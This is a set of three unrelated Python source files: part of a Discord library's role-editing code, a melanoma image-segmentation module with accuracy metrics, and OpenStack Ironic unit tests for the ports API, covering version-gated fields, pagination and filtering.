            role was asked to be moved.
        """
        # position changes go through the dedicated bulk-move endpoint first
        position = fields.get('position')
        if position is not None:
            yield from self._move(position, reason=reason)
            self.position = position
        # accept either spelling; 'colour' wins when both are given
        try:
            colour = fields['colour']
        except KeyError:
            colour = fields.get('color', self.colour)
        payload = {
            'name': fields.get('name', self.name),
            'permissions': fields.get('permissions', self.permissions).value,
            'color': colour.value,
            'hoist': fields.get('hoist', self.hoist),
            'mentionable': fields.get('mentionable', self.mentionable)
        }
        data = yield from self._state.http.edit_role(self.guild.id, self.id, reason=reason, **payload)
        # NOTE(review): _update() re-reads 'position' from the response with
        # a default of 0 -- confirm the API echoes the position back.
        self._update(data)

    @asyncio.coroutine
    def delete(self, *, reason=None):
        """|coro|

        Deletes the role.

        You must have the :attr:`Permissions.manage_roles` permission to
        use this.

        Parameters
        -----------
        reason: Optional[str]
            The reason for deleting this role. Shows up on the audit log.

        Raises
        --------
        Forbidden
            You do not have permissions to delete the role.
        HTTPException
            Deleting the role failed.
        """
        yield from self._state.http.delete_role(self.guild.id, self.id, reason=reason)
| |
from util.image import Image
from scipy.misc import imread
import numpy as np
import config as cfg
import time
"""
Implements methods to classify images
"""
def classify(melanoma, ground, feature, classifier, block=True):
    """Segment every melanoma image and time each segmentation.

    Parameters
    ----------
    melanoma: list
        File names of the melanoma images (relative to cfg.melanoma_path)
    ground: list
        File names of the matching ground-truth images
    feature: object
        Feature extractor with a features(block) method
    classifier: object
        Trained classifier with a predict(values) method
    block: bool
        Segment per block when True, per pixel otherwise

    Returns
    -------
    Three lists: segmented images, elapsed seconds per image, image shapes.
    """
    seg = []
    tim = []
    dim = []
    # choose the segmentation strategy once, outside the loop
    segment = per_block if block else per_pixel
    for melanoma_item, ground_item in zip(melanoma, ground):
        print('Segmentating...')
        print('\t' + melanoma_item)
        img = Image(cfg.melanoma_path + melanoma_item, cfg.ground_path + ground_item, cfg.block)
        size = img.get_shape()
        portion = img.get_portion()
        dim.append(size)
        img_seg = np.zeros((size[0], size[1]))
        # keep a margin of `portion` pixels on every side
        row = [portion, size[0] - portion]
        col = [portion, size[1] - portion]
        started = time.time()
        seg.append(segment(img, img_seg, row, col, feature, classifier))
        tim.append(time.time() - started)
    return seg, tim, dim
def per_block(img, img_seg, row, col, feature, classifier):
    """Fill img_seg by classifying square 9x9 blocks.

    Each block centred on a grid point gets the classifier's prediction
    written into the corresponding 9x9 patch of img_seg.
    """
    ratio = 4
    step = 2 * ratio + 1  # block side length (9)
    for top in range(row[0], row[1], step):
        for left in range(col[0], col[1], step):
            patch = img.get_block([top, left])
            values = feature.features(patch)
            label = classifier.predict([values])
            img_seg[top: top + step, left: left + step] = label
    return img_seg
def per_pixel(img, img_seg, row, col, feature, classifier):
    """Fill img_seg by classifying the block around every single pixel."""
    for r_idx in range(row[0], row[1]):
        for c_idx in range(col[0], col[1]):
            patch = img.get_block([r_idx, c_idx])
            values = feature.features(patch)
            img_seg[r_idx, c_idx] = classifier.predict([values])
    return img_seg
def local_error(confmat):
    """
    Calculates the accuracy by each image

    Parameters
    ----------
    confmat: list of lists
        The confusion matrix to calculate the accuracy, TP, FP, FN, TN

    Returns
    -------
    A list of list with 3 values (Sensitivity, Specificity, Accuracy)
    """
    local_err = []
    # each row holds exactly (TP, FP, FN, TN)
    for TP, FP, FN, TN in confmat:
        sensitivity = TP / (TP + FN)
        specificity = TN / (TN + FP)
        accuracy = (TP + TN) / (TP + FP + TN + FN)
        local_err.append([sensitivity, specificity, accuracy])
    return local_err
def total_error(local_acc):
    """
    Calculates the mean accuracy of a list of local accuracys

    Parameters
    ----------
    local_acc: list of lists
        The local accuracy of each image

    Returns
    -------
    3 values, (Sensitivity, Specificity, Accuracy)
    """
    scores = np.array(local_acc)
    # column 0: sensitivity, 1: specificity, 2: accuracy
    stats = [[scores[:, column].mean(), scores[:, column].std()]
             for column in range(3)]
    return stats[0], stats[1], stats[2]
def estimate_error(confmat):
    """
    Calculates the accuracy from a confusion matrix.

    Parameters
    ----------
    confmat: list of lists
        The confusion matrix to calculate the accuracy

    Returns
    -------
    3 values, (Sensitivity, Specificity, Accuracy)
    """
    # sum the per-image rows into global (TP, FP, FN, TN) totals
    totals = np.array(confmat).sum(axis=0)
    TP, FP, FN, TN = totals[0], totals[1], totals[2], totals[3]
    sensitivity = TP / (TP + FN)
    specificity = TN / (TN + FP)
    accuracy = (TP + TN) / (TP + FP + TN + FN)
    return sensitivity, specificity, accuracy
def confusion_matrix(seg, ground_list):
    """
    Calculates the confusion matrix

    Parameters
    ----------
    seg: list
        A list with the segmented images. Each item of the list is a 2D-array
    ground_list: list
        A list with all the ground_truth path of the segmented images.

    Returns
    -------
    A list of 1D-array. Each sublist contents the values TP, FP, FN, TN of a confusion matrix.
    """
    # BUG FIX: removed an unused local `from skimage import io` import.
    acc = []
    for s, g in zip(seg, ground_list):
        ground = imread(cfg.ground_path + g)
        # NOTE(review): assumes the ground image and the segmentation share
        # the same shape -- confirm upstream.
        m1 = ground.astype(int)  # ground truth (0 background, 255 lesion)
        m2 = s.astype(int)       # predicted segmentation
        conf = np.zeros((4,), dtype=int)  # TP, FP, FN, TN
        # Vectorized counts replace the former per-pixel double loop:
        # identical classification rules, evaluated in C instead of Python.
        matches = m1 == m2
        conf[0] = np.count_nonzero(matches & (m1 == 255))  # TP: both lesion
        conf[3] = np.count_nonzero(matches & (m1 == 0))    # TN: both background
        conf[2] = np.count_nonzero(m1 > m2)                # FN: lesion missed
        conf[1] = np.count_nonzero(m1 < m2)                # FP: lesion invented
        acc.append(conf)
    return acc
"""
# Calculate the accuracy and save the segmentation image
def accurate_and_segmentation(self, data_set, ground_set, set=None, string=None):
size = len(data_set)
acc = np.zeros((size, 4), dtype=int)
data_path = None
ground_path = None
if set is not None:
if set == 'test':
data_path = cfg.test_data_path
ground_path = cfg.test_ground_path
elif set == 'train':
data_path = cfg.train_data_path
ground_path = cfg.train_ground_path
cont = 0
for (data, ground) in zip(data_set, ground_set):
c = self.classify_advanced(data_path + data, block=True)
g = read_image(ground_path + ground)
self.save_segmentation(data, c, string)
acc[cont, :] = self.compare_ground_truth(g, c)
cont += 1
return acc
else:
print('Expected a set value. Posible values: train or test')
raise AttributeError
# Classify and calculates the mse between the image classified and the ground image
def accurate(self, data_set, ground_set, set=None):
acc = np.zeros((15, 4), dtype=int)
data_path = None
ground_path = None
if set is not None:
if set == 'test':
data_path = cfg.test_data_path
ground_path = cfg.test_ground_path
elif set == 'train':
data_path = cfg.train_data_path
ground_path = cfg.train_ground_path
cont = 0
for (data, ground) in zip(data_set, ground_set):
c = self.classify_RGB(data_path + data, block=False)
g = read_image(ground_path + ground)
#self.save_accurate(data, c)
self.save_segmentation(data, c, '')
acc[cont, :] = self.compare_ground_truth(g, c)
cont += 1
return acc
else:
print('Expected a set value. Posible values: train or test')
raise AttributeError
# Classify a data set
def classify_RGB(self, data, block=None):
image = Image(data, 'None', cfg.blockDim)
original_size = image.get_original_size()
image_classified = np.zeros((original_size[0], original_size[1]))
start_row = cfg.blockDim
end_row = image.image.shape[0] - cfg.blockDim
start_col = cfg.blockDim
end_col = image.image.shape[1] - cfg.blockDim
if (block is None) or (block):
ratio = 4 # block dimension is (9x9)
start_row += ratio
end_row -= ratio
start_col += ratio
end_col -= ratio
for row in range(start_row, end_row, ratio + 1):
for col in range(start_col, end_col, ratio + 1):
blk = image.get_block([row, col]) # 25x25 get the block 25x25 from the central pixel
rgb = self.feature.mean_rgb(blk) # [mean r, mean g, mean b] calculate means
gab = self.feature.gabor_filter(blk) # [gab 0, gab 1, gab 2, gab 3] calculate mean convolve gabor filters
set = [*rgb, *gab]
pred = self.learning.predict([set])
image_classified[row - cfg.blockDim: row - cfg.blockDim + (ratio * 2) + 1,
col - cfg.blockDim: col - cfg.blockDim + (ratio * 2) + 1] = pred
return image_classified
else:
print("Classifying pixel per pixel")
for row in range(start_row, end_row):
for col in range(start_col, end_col):
blk = image.get_block([row, col]) # 25x25 get the block 25x25 from the central pixel
rgb = self.feature.mean_rgb(blk) # [mean r, mean g, mean b] calculate means
gab = self.feature.gabor_filter(blk) # [gab 0, gab 1, gab 2, gab 3] calculate mean convolve gabor filters
set = [*rgb, *gab]
image_classified[row - cfg.blockDim, col - cfg.blockDim] = self.learning.predict([set])
return image_classified
def classify_advanced(self, data, block=None):
image = Image(data, 'None', cfg.blockDim)
ground = get_segmentation(data)
self.feature.set_theta(ground, False)
self.feature.set_kernel()
original_size = image.get_original_size()
image_classified = np.zeros((original_size[0], original_size[1]))
start_row = cfg.blockDim
end_row = image.image.shape[0] - cfg.blockDim
start_col = cfg.blockDim
end_col = image.image.shape[1] - cfg.blockDim
if (block is None) or (block):
ratio = 4 # block dimension is (9x9)
start_row += ratio
end_row -= ratio
start_col += ratio
end_col -= ratio
for row in range(start_row, end_row, ratio + 1):
for col in range(start_col, end_col, ratio + 1):
blk = image.get_block([row, col]) # 25x25 get the block 25x25 from the central pixel
mm = self.feature.max_min(blk)
hsv = self.feature.mean_hsv(blk)
rgb = self.feature.mean_rgb(blk)
std = self.feature.standar_deviation(blk)
gab = self.feature.gabor_filter(blk)
set = [*mm, *hsv, *rgb, *std, gab]
pred = self.learning.predict([set])
image_classified[row - cfg.blockDim: row - cfg.blockDim + (ratio * 2) + 1,
col - cfg.blockDim: col - cfg.blockDim + (ratio * 2) + 1] = pred
return image_classified
else:
for row in range(start_row, end_row):
for col in range(start_col, end_col):
blk = image.get_block([row, col]) # 25x25 get the block 25x25 from the central pixel
mm = self.feature.max_min(blk)
hsv = self.feature.mean_hsv(blk)
rgb = self.feature.mean_rgb(blk)
std = self.feature.standar_deviation(blk)
gab = self.feature.gabor_filter(blk)
set = [*mm, *hsv, *rgb, *std, gab]
image_classified[row - cfg.blockDim, col - cfg.blockDim] = self.learning.predict([set])
return image_classified
# m1 es la imagen original, y m2 es la segmentada
# Print accurate
def save_accurate(self, data, c):
print("Saving image")
path = "/home/mrobot/Documentos/TFG/code/imagenes/test/"
file, ext = str.split(data, '.')
nI = str(cfg.nImage)
nS = str(cfg.nSample)
io.imsave(path + file + "_" + nI + "_" + nS + ".png", c)
# save segmentation
def save_segmentation(self, data, c, string):
print("Saving segmentation")
path = "/home/mrobot/Documentos/TFG/code/imagenes/unity_test/"
file, ext = str.split(data, '.')
io.imsave(path + file + "_" + string + ".png", c)
# Calculates the mean-square error between two images
def mean_squared_error(self, im1, im2):
from skimage.measure import compare_mse
return compare_mse(im1, im2)
"""
| |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Tests for the API /ports/ methods.
"""
import datetime
import mock
from oslo_config import cfg
from oslo_utils import timeutils
from oslo_utils import uuidutils
import six
from six.moves import http_client
from six.moves.urllib import parse as urlparse
from testtools import matchers
from wsme import types as wtypes
from ironic.api.controllers import base as api_base
from ironic.api.controllers import v1 as api_v1
from ironic.api.controllers.v1 import notification_utils
from ironic.api.controllers.v1 import port as api_port
from ironic.api.controllers.v1 import utils as api_utils
from ironic.api.controllers.v1 import versions
from ironic.common import exception
from ironic.common import utils as common_utils
from ironic.conductor import rpcapi
from ironic import objects
from ironic.objects import fields as obj_fields
from ironic.tests import base
from ironic.tests.unit.api import base as test_api_base
from ironic.tests.unit.api import utils as apiutils
from ironic.tests.unit.db import utils as db_utils
from ironic.tests.unit.objects import utils as obj_utils
# NOTE(lucasagomes): When creating a port via API (POST)
# we have to use node_uuid and portgroup_uuid
# NOTE(lucasagomes): When creating a port via API (POST)
# we have to use node_uuid and portgroup_uuid
def post_get_test_port(**kw):
    """Build a port POST body, defaulting the node/portgroup references.

    The API payload references node and portgroup by UUID, so missing values
    fall back to the stock test node/portgroup UUIDs.
    """
    port = apiutils.port_post_data(**kw)
    fallbacks = {
        'node_uuid': db_utils.get_test_node()['uuid'],
        'portgroup_uuid': db_utils.get_test_portgroup()['uuid'],
    }
    for field, fallback in fallbacks.items():
        port[field] = kw.get(field, fallback)
    return port
def _rpcapi_create_port(self, context, port, topic):
"""Fake used to mock out the conductor RPCAPI's create_port method.
Performs creation of the port object and returns the created port as-per
the real method.
"""
port.create()
return port
def _rpcapi_update_port(self, context, port, topic):
"""Fake used to mock out the conductor RPCAPI's update_port method.
Saves the updated port object and returns the updated port as-per the real
method.
"""
port.save()
return port
class TestPortObject(base.TestCase):
    """Unit tests for the API-layer Port object wrapper."""

    @mock.patch("pecan.request")
    def test_port_init(self, mock_pecan_req):
        # Field visibility depends on the request's API microversion;
        # pin it on the mocked pecan request.
        mock_pecan_req.version.minor = 1
        port_dict = apiutils.port_post_data(node_id=None,
                                            portgroup_uuid=None)
        del port_dict['extra']
        port = api_port.Port(**port_dict)
        # A field omitted from the POST body must come through as
        # wtypes.Unset, not None.
        self.assertEqual(wtypes.Unset, port.extra)
@mock.patch.object(api_utils, 'allow_port_physical_network', autospec=True)
@mock.patch.object(api_utils, 'allow_portgroups_subcontrollers', autospec=True)
@mock.patch.object(api_utils, 'allow_port_advanced_net_fields', autospec=True)
class TestPortsController__CheckAllowedPortFields(base.TestCase):
    """Tests for PortsController._check_allowed_port_fields version gating.

    The class-level patches apply bottom-up, so each test method receives
    the mocks in the order: advanced-net-fields, portgroups-subcontrollers,
    physical-network.
    """

    def setUp(self):
        super(TestPortsController__CheckAllowedPortFields, self).setUp()
        self.controller = api_port.PortsController()

    def test__check_allowed_port_fields_none(self, mock_allow_port,
                                             mock_allow_portgroup,
                                             mock_allow_physnet):
        # fields=None skips every version check entirely
        self.assertIsNone(
            self.controller._check_allowed_port_fields(None))
        self.assertFalse(mock_allow_port.called)
        self.assertFalse(mock_allow_portgroup.called)
        self.assertFalse(mock_allow_physnet.called)

    def test__check_allowed_port_fields_empty(self, mock_allow_port,
                                              mock_allow_portgroup,
                                              mock_allow_physnet):
        # an empty field list passes regardless of the advanced-fields check
        for v in (True, False):
            mock_allow_port.return_value = v
            self.assertIsNone(
                self.controller._check_allowed_port_fields([]))
            mock_allow_port.assert_called_once_with()
            mock_allow_port.reset_mock()
            self.assertFalse(mock_allow_portgroup.called)
            self.assertFalse(mock_allow_physnet.called)

    def test__check_allowed_port_fields_not_allow(self, mock_allow_port,
                                                  mock_allow_portgroup,
                                                  mock_allow_physnet):
        # every advanced net field is rejected when the version disallows it
        mock_allow_port.return_value = False
        for field in api_port.PortsController.advanced_net_fields:
            self.assertRaises(exception.NotAcceptable,
                              self.controller._check_allowed_port_fields,
                              [field])
            mock_allow_port.assert_called_once_with()
            mock_allow_port.reset_mock()
            self.assertFalse(mock_allow_portgroup.called)
            self.assertFalse(mock_allow_physnet.called)

    def test__check_allowed_port_fields_allow(self, mock_allow_port,
                                              mock_allow_portgroup,
                                              mock_allow_physnet):
        # every advanced net field is accepted when the version allows it
        mock_allow_port.return_value = True
        for field in api_port.PortsController.advanced_net_fields:
            self.assertIsNone(
                self.controller._check_allowed_port_fields([field]))
            mock_allow_port.assert_called_once_with()
            mock_allow_port.reset_mock()
            self.assertFalse(mock_allow_portgroup.called)
            self.assertFalse(mock_allow_physnet.called)

    def test__check_allowed_port_fields_portgroup_not_allow(
            self, mock_allow_port, mock_allow_portgroup, mock_allow_physnet):
        # portgroup_uuid additionally requires the portgroups check
        mock_allow_port.return_value = True
        mock_allow_portgroup.return_value = False
        self.assertRaises(exception.NotAcceptable,
                          self.controller._check_allowed_port_fields,
                          ['portgroup_uuid'])
        mock_allow_port.assert_called_once_with()
        mock_allow_portgroup.assert_called_once_with()
        self.assertFalse(mock_allow_physnet.called)

    def test__check_allowed_port_fields_portgroup_allow(
            self, mock_allow_port, mock_allow_portgroup, mock_allow_physnet):
        mock_allow_port.return_value = True
        mock_allow_portgroup.return_value = True
        self.assertIsNone(
            self.controller._check_allowed_port_fields(['portgroup_uuid']))
        mock_allow_port.assert_called_once_with()
        mock_allow_portgroup.assert_called_once_with()
        self.assertFalse(mock_allow_physnet.called)

    def test__check_allowed_port_fields_physnet_not_allow(
            self, mock_allow_port, mock_allow_portgroup, mock_allow_physnet):
        # physical_network additionally requires the physnet check
        mock_allow_port.return_value = True
        mock_allow_physnet.return_value = False
        self.assertRaises(exception.NotAcceptable,
                          self.controller._check_allowed_port_fields,
                          ['physical_network'])
        mock_allow_port.assert_called_once_with()
        self.assertFalse(mock_allow_portgroup.called)
        mock_allow_physnet.assert_called_once_with()

    def test__check_allowed_port_fields_physnet_allow(
            self, mock_allow_port, mock_allow_portgroup, mock_allow_physnet):
        mock_allow_port.return_value = True
        mock_allow_physnet.return_value = True
        self.assertIsNone(
            self.controller._check_allowed_port_fields(['physical_network']))
        mock_allow_port.assert_called_once_with()
        self.assertFalse(mock_allow_portgroup.called)
        mock_allow_physnet.assert_called_once_with()
class TestListPorts(test_api_base.BaseApiTest):
    """Tests for the port listing/read endpoints (/ports, /ports/detail).

    Covers summary vs. detail views, microversion gating of fields
    (internal_info, pxe_enabled, local_link_connection, portgroup_uuid,
    physical_network), ?fields= projections, pagination, sorting, and
    filtering by address, node and portgroup.
    """

    def setUp(self):
        super(TestListPorts, self).setUp()
        # All ports created by these tests belong to this single node.
        self.node = obj_utils.create_test_node(self.context)

    def test_empty(self):
        data = self.get_json('/ports')
        self.assertEqual([], data['ports'])

    def test_one(self):
        """The summary listing exposes only a minimal set of fields."""
        port = obj_utils.create_test_port(self.context, node_id=self.node.id)
        data = self.get_json('/ports')
        self.assertEqual(port.uuid, data['ports'][0]["uuid"])
        self.assertNotIn('extra', data['ports'][0])
        self.assertNotIn('node_uuid', data['ports'][0])
        # never expose the node_id
        self.assertNotIn('node_id', data['ports'][0])

    def test_get_one(self):
        port = obj_utils.create_test_port(self.context, node_id=self.node.id)
        data = self.get_json('/ports/%s' % port.uuid)
        self.assertEqual(port.uuid, data['uuid'])
        self.assertIn('extra', data)
        self.assertIn('node_uuid', data)
        # never expose the node_id, port_id, portgroup_id
        self.assertNotIn('node_id', data)
        self.assertNotIn('port_id', data)
        self.assertNotIn('portgroup_id', data)
        # default headers predate 1.24, so portgroup_uuid is hidden too
        self.assertNotIn('portgroup_uuid', data)

    def test_get_one_portgroup_is_none(self):
        """At API 1.24+ portgroup_uuid is present even when unset."""
        port = obj_utils.create_test_port(self.context, node_id=self.node.id)
        data = self.get_json('/ports/%s' % port.uuid,
                             headers={api_base.Version.string: '1.24'})
        self.assertEqual(port.uuid, data['uuid'])
        self.assertIn('extra', data)
        self.assertIn('node_uuid', data)
        # never expose the node_id, port_id, portgroup_id
        self.assertNotIn('node_id', data)
        self.assertNotIn('port_id', data)
        self.assertNotIn('portgroup_id', data)
        self.assertIn('portgroup_uuid', data)

    def test_get_one_custom_fields(self):
        port = obj_utils.create_test_port(self.context, node_id=self.node.id)
        fields = 'address,extra'
        data = self.get_json(
            '/ports/%s?fields=%s' % (port.uuid, fields),
            headers={api_base.Version.string: str(api_v1.MAX_VER)})
        # We always append "links"
        self.assertItemsEqual(['address', 'extra', 'links'], data)

    def test_hide_fields_in_newer_versions_internal_info(self):
        """internal_info is hidden below API 1.18 and shown from 1.18 on."""
        port = obj_utils.create_test_port(self.context, node_id=self.node.id,
                                          internal_info={"foo": "bar"})
        data = self.get_json(
            '/ports/%s' % port.uuid,
            headers={api_base.Version.string: str(api_v1.MIN_VER)})
        self.assertNotIn('internal_info', data)

        data = self.get_json('/ports/%s' % port.uuid,
                             headers={api_base.Version.string: "1.18"})
        self.assertEqual({"foo": "bar"}, data['internal_info'])

    def test_hide_fields_in_newer_versions_advanced_net(self):
        """pxe_enabled/local_link_connection appear only from API 1.19."""
        llc = {'switch_info': 'switch', 'switch_id': 'aa:bb:cc:dd:ee:ff',
               'port_id': 'Gig0/1'}
        port = obj_utils.create_test_port(self.context, node_id=self.node.id,
                                          pxe_enabled=True,
                                          local_link_connection=llc)
        data = self.get_json(
            '/ports/%s' % port.uuid,
            headers={api_base.Version.string: "1.18"})
        self.assertNotIn('pxe_enabled', data)
        self.assertNotIn('local_link_connection', data)

        data = self.get_json('/ports/%s' % port.uuid,
                             headers={api_base.Version.string: "1.19"})
        self.assertTrue(data['pxe_enabled'])
        self.assertEqual(llc, data['local_link_connection'])

    def test_hide_fields_in_newer_versions_portgroup_uuid(self):
        """portgroup_uuid appears only from API 1.24."""
        portgroup = obj_utils.create_test_portgroup(self.context,
                                                    node_id=self.node.id)
        port = obj_utils.create_test_port(self.context, node_id=self.node.id,
                                          portgroup_id=portgroup.id)
        data = self.get_json(
            '/ports/%s' % port.uuid,
            headers={api_base.Version.string: "1.23"})
        self.assertNotIn('portgroup_uuid', data)

        data = self.get_json('/ports/%s' % port.uuid,
                             headers={api_base.Version.string: "1.24"})
        self.assertEqual(portgroup.uuid, data['portgroup_uuid'])

    def test_hide_fields_in_newer_versions_physical_network(self):
        """physical_network appears only from API 1.34."""
        port = obj_utils.create_test_port(self.context, node_id=self.node.id,
                                          physical_network='physnet1')
        data = self.get_json(
            '/ports/%s' % port.uuid,
            headers={api_base.Version.string: "1.33"})
        self.assertNotIn('physical_network', data)

        data = self.get_json('/ports/%s' % port.uuid,
                             headers={api_base.Version.string: "1.34"})
        self.assertEqual("physnet1", data['physical_network'])

    @mock.patch.object(objects.Port, 'supports_physical_network')
    def test_hide_fields_in_newer_versions_physical_network_upgrade(self,
                                                                    mock_spn):
        """physical_network stays hidden during a rolling upgrade.

        Even at API 1.34, the field is suppressed while the Port object
        reports that physical_network is not yet supported cluster-wide.
        """
        mock_spn.return_value = False
        port = obj_utils.create_test_port(self.context, node_id=self.node.id,
                                          physical_network='physnet1')
        data = self.get_json(
            '/ports/%s' % port.uuid,
            headers={api_base.Version.string: "1.34"})
        self.assertNotIn('physical_network', data)

    def test_get_collection_custom_fields(self):
        fields = 'uuid,extra'
        for i in range(3):
            obj_utils.create_test_port(self.context,
                                       node_id=self.node.id,
                                       uuid=uuidutils.generate_uuid(),
                                       address='52:54:00:cf:2d:3%s' % i)

        data = self.get_json(
            '/ports?fields=%s' % fields,
            headers={api_base.Version.string: str(api_v1.MAX_VER)})

        self.assertEqual(3, len(data['ports']))
        for port in data['ports']:
            # We always append "links"
            self.assertItemsEqual(['uuid', 'extra', 'links'], port)

    def test_get_custom_fields_invalid_fields(self):
        """An unknown field name in ?fields= is a 400 naming the field."""
        port = obj_utils.create_test_port(self.context, node_id=self.node.id)
        fields = 'uuid,spongebob'
        response = self.get_json(
            '/ports/%s?fields=%s' % (port.uuid, fields),
            headers={api_base.Version.string: str(api_v1.MAX_VER)},
            expect_errors=True)
        self.assertEqual(http_client.BAD_REQUEST, response.status_int)
        self.assertEqual('application/json', response.content_type)
        self.assertIn('spongebob', response.json['error_message'])

    def test_get_custom_fields_invalid_api_version(self):
        """?fields= itself is rejected below the version that added it."""
        port = obj_utils.create_test_port(self.context, node_id=self.node.id)
        fields = 'uuid,extra'
        response = self.get_json(
            '/ports/%s?fields=%s' % (port.uuid, fields),
            headers={api_base.Version.string: str(api_v1.MIN_VER)},
            expect_errors=True)
        self.assertEqual(http_client.NOT_ACCEPTABLE, response.status_int)

    def test_get_custom_fields_physical_network(self):
        """Selecting physical_network via ?fields= is gated on API 1.34."""
        port = obj_utils.create_test_port(self.context, node_id=self.node.id,
                                          physical_network='physnet1')
        fields = 'uuid,physical_network'
        response = self.get_json(
            '/ports/%s?fields=%s' % (port.uuid, fields),
            headers={api_base.Version.string: "1.33"},
            expect_errors=True)
        self.assertEqual(http_client.NOT_ACCEPTABLE, response.status_int)

        response = self.get_json(
            '/ports/%s?fields=%s' % (port.uuid, fields),
            headers={api_base.Version.string: "1.34"})
        # We always append "links".
        self.assertItemsEqual(['uuid', 'physical_network', 'links'], response)

    @mock.patch.object(objects.Port, 'supports_physical_network')
    def test_get_custom_fields_physical_network_upgrade(self, mock_spn):
        """?fields=physical_network is rejected mid rolling upgrade."""
        mock_spn.return_value = False
        port = obj_utils.create_test_port(self.context, node_id=self.node.id,
                                          physical_network='physnet1')
        fields = 'uuid,physical_network'
        response = self.get_json(
            '/ports/%s?fields=%s' % (port.uuid, fields),
            headers={api_base.Version.string: "1.34"},
            expect_errors=True)
        self.assertEqual(http_client.NOT_ACCEPTABLE, response.status_int)

    def test_detail(self):
        """The detail view exposes every public field at MAX_VER."""
        llc = {'switch_info': 'switch', 'switch_id': 'aa:bb:cc:dd:ee:ff',
               'port_id': 'Gig0/1'}
        portgroup = obj_utils.create_test_portgroup(self.context,
                                                    node_id=self.node.id)
        port = obj_utils.create_test_port(self.context, node_id=self.node.id,
                                          portgroup_id=portgroup.id,
                                          pxe_enabled=False,
                                          local_link_connection=llc,
                                          physical_network='physnet1')
        data = self.get_json(
            '/ports/detail',
            headers={api_base.Version.string: str(api_v1.MAX_VER)}
        )
        self.assertEqual(port.uuid, data['ports'][0]["uuid"])
        self.assertIn('extra', data['ports'][0])
        self.assertIn('internal_info', data['ports'][0])
        self.assertIn('node_uuid', data['ports'][0])
        self.assertIn('pxe_enabled', data['ports'][0])
        self.assertIn('local_link_connection', data['ports'][0])
        self.assertIn('portgroup_uuid', data['ports'][0])
        self.assertIn('physical_network', data['ports'][0])
        # never expose the node_id and portgroup_id
        self.assertNotIn('node_id', data['ports'][0])
        self.assertNotIn('portgroup_id', data['ports'][0])

    def test_detail_against_single(self):
        """/ports/<uuid>/detail is not a valid resource — 404."""
        port = obj_utils.create_test_port(self.context, node_id=self.node.id)
        response = self.get_json('/ports/%s/detail' % port.uuid,
                                 expect_errors=True)
        self.assertEqual(http_client.NOT_FOUND, response.status_int)

    def test_many(self):
        ports = []
        for id_ in range(5):
            port = obj_utils.create_test_port(
                self.context, node_id=self.node.id,
                uuid=uuidutils.generate_uuid(),
                address='52:54:00:cf:2d:3%s' % id_)
            ports.append(port.uuid)
        data = self.get_json('/ports')
        self.assertEqual(len(ports), len(data['ports']))

        uuids = [n['uuid'] for n in data['ports']]
        six.assertCountEqual(self, ports, uuids)

    def _test_links(self, public_url=None):
        """Verify self/bookmark links, optionally under a public_endpoint."""
        cfg.CONF.set_override('public_endpoint', public_url, 'api')
        uuid = uuidutils.generate_uuid()
        obj_utils.create_test_port(self.context,
                                   uuid=uuid,
                                   node_id=self.node.id)
        data = self.get_json('/ports/%s' % uuid)
        self.assertIn('links', data.keys())
        self.assertEqual(2, len(data['links']))
        self.assertIn(uuid, data['links'][0]['href'])
        for l in data['links']:
            bookmark = l['rel'] == 'bookmark'
            self.assertTrue(self.validate_link(l['href'], bookmark=bookmark))

        if public_url is not None:
            expected = [{'href': '%s/v1/ports/%s' % (public_url, uuid),
                         'rel': 'self'},
                        {'href': '%s/ports/%s' % (public_url, uuid),
                         'rel': 'bookmark'}]
            for i in expected:
                self.assertIn(i, data['links'])

    def test_links(self):
        self._test_links()

    def test_links_public_url(self):
        self._test_links(public_url='http://foo')

    def test_collection_links(self):
        """?limit= truncates the page and produces a 'next' marker link."""
        ports = []
        for id_ in range(5):
            port = obj_utils.create_test_port(
                self.context,
                node_id=self.node.id,
                uuid=uuidutils.generate_uuid(),
                address='52:54:00:cf:2d:3%s' % id_)
            ports.append(port.uuid)
        data = self.get_json('/ports/?limit=3')
        self.assertEqual(3, len(data['ports']))

        next_marker = data['ports'][-1]['uuid']
        self.assertIn(next_marker, data['next'])

    def test_collection_links_default_limit(self):
        """The configured max_limit caps pages even without ?limit=."""
        cfg.CONF.set_override('max_limit', 3, 'api')
        ports = []
        for id_ in range(5):
            port = obj_utils.create_test_port(
                self.context,
                node_id=self.node.id,
                uuid=uuidutils.generate_uuid(),
                address='52:54:00:cf:2d:3%s' % id_)
            ports.append(port.uuid)
        data = self.get_json('/ports')
        self.assertEqual(3, len(data['ports']))

        next_marker = data['ports'][-1]['uuid']
        self.assertIn(next_marker, data['next'])

    def test_port_by_address(self):
        """?address= filters the listing down to the single match."""
        address_template = "aa:bb:cc:dd:ee:f%d"
        for id_ in range(3):
            obj_utils.create_test_port(self.context,
                                       node_id=self.node.id,
                                       uuid=uuidutils.generate_uuid(),
                                       address=address_template % id_)

        target_address = address_template % 1
        data = self.get_json('/ports?address=%s' % target_address)
        self.assertThat(data['ports'], matchers.HasLength(1))
        self.assertEqual(target_address, data['ports'][0]['address'])

    def test_port_by_address_non_existent_address(self):
        # non-existent address
        data = self.get_json('/ports?address=%s' % 'aa:bb:cc:dd:ee:ff')
        self.assertThat(data['ports'], matchers.HasLength(0))

    def test_port_by_address_invalid_address_format(self):
        obj_utils.create_test_port(self.context, node_id=self.node.id)
        invalid_address = 'invalid-mac-format'
        response = self.get_json('/ports?address=%s' % invalid_address,
                                 expect_errors=True)
        self.assertEqual(http_client.BAD_REQUEST, response.status_int)
        self.assertEqual('application/json', response.content_type)
        self.assertIn(invalid_address, response.json['error_message'])

    def test_sort_key(self):
        ports = []
        for id_ in range(3):
            port = obj_utils.create_test_port(
                self.context,
                node_id=self.node.id,
                uuid=uuidutils.generate_uuid(),
                address='52:54:00:cf:2d:3%s' % id_)
            ports.append(port.uuid)
        data = self.get_json('/ports?sort_key=uuid')
        uuids = [n['uuid'] for n in data['ports']]
        self.assertEqual(sorted(ports), uuids)

    def test_sort_key_invalid(self):
        """Unsortable/unknown keys are rejected with a 400 naming the key."""
        invalid_keys_list = ['foo', 'extra', 'internal_info',
                             'local_link_connection']
        for invalid_key in invalid_keys_list:
            response = self.get_json(
                '/ports?sort_key=%s' % invalid_key, expect_errors=True,
                headers={api_base.Version.string: str(api_v1.MAX_VER)}
            )
            self.assertEqual(http_client.BAD_REQUEST, response.status_int)
